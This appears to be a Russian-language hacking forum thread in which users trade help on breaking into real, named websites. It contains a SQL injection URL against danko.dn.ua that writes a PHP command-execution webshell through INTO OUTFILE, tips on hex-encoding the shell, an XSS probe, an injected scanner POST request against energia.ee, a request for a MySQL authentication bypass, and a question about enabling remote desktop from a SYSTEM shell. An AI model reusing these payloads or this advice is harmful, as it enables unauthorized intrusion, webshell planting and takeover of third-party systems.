это не всё что хочу, ты заблуждаешься. даже uid=0(root) gid=0(root) groups=0(root) может не дать тебе всех прав, бывает и такое.
-=megahertz=-, напиши там же uname -a и скинь результат, или сам поищи на милворме или просто в гугле сплойт
Была найдена такая уязвимость: на одном варез сайте есть такой сервис, что если к адресу сайта подписать такое: site.ru/?site=ваш_сайт (без HTTP://), то на всех страницах сайта будет ссылка внизу страницы на ваш_сайт! Попробова ввести такой URL вида site.ru/fol/?list="><script>alert()</script> - выскакивает аларм )) попробовал ввести в URL php код - не прлучилось, вопросительные знаки режутся. Пробовал в разных кодировках - все бестолку. Но кроме знака вопроса больше ничего не режется! Вопрос собственно такой: как еще можно навредить сайту через эту уязвимость если сайт НЕ поддерживает куки? Там вообще даже нету регистрации юзеров.
Блин нифига понять немогу есть скуль такого вида danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/' пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php ver-5.1.22-rc user-root@localhost http://danko.dn.ua/admin/fckeditor/_samples/php/
даже после нормальной заливки шелла может возвращаться ошибка, и еще лучше шелл закодировать в hex, и точно кавычки не экранируются? возможно нет прав/файл существует, вобщем по тем данным что ты дал, одназначно не скажешь
попробуй LOAD_FILE если не катит, попробуй в хекс закодировать путь до файла, если опять не катит, значит file_priv отключен, тогда забей, если все ок, то шелл в хекс и заливай.
LOAD_FILE есть file_priv -ок и шелл кодировать пробовал буду пробовать залить в базу а потом из базы в файл
Kuzya, _ttp://www.citforum.ru/internet/html/ssi.shtml и http://ru.wikipedia.org/wiki/SSI_(%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5)
кто подскажет как это реализовать? Удаленный пользователь может представить специально обработанный авторизационный пакет, чтобы обойти механизм авторизации на MySQL сервере. Уязвимость расположена в check_scramble_323() функции.
POST /index.php?id=211 HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.energia.ee Content-Length: 282 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm html_enabled=1&subject=Elektritarne%20pakkumine%20L%C3%A4tis%20v%C3%B5i%20Leedus&locationData=979%3Att_content%3A3514&Ettev%C3%B5te="+or+1%3D1+--+&[email protected]&[email protected]&[email protected]&formtype_mail=Saada Орёт,что скуля. Пробывал постами меняя параметры заставить отреагировать серв,но ему поф даже на 1+and+0=0 и 1+and+1=1 Менял параметры, как только мог. Есть тут инжект или нету?
моя хотело сказать,что ему абсолютно ПОФ,тобишь он возвращает одинаковый результат,обрезает чели,потому что при смени ид меняется только страница )),а запросы он как будто ваще не видит: )
при подключение через mstsc.exe пишет Эудалённые подключения запрещены" как запустить? есть шелл на удалённой системе к которой произвожу коннэкт. права system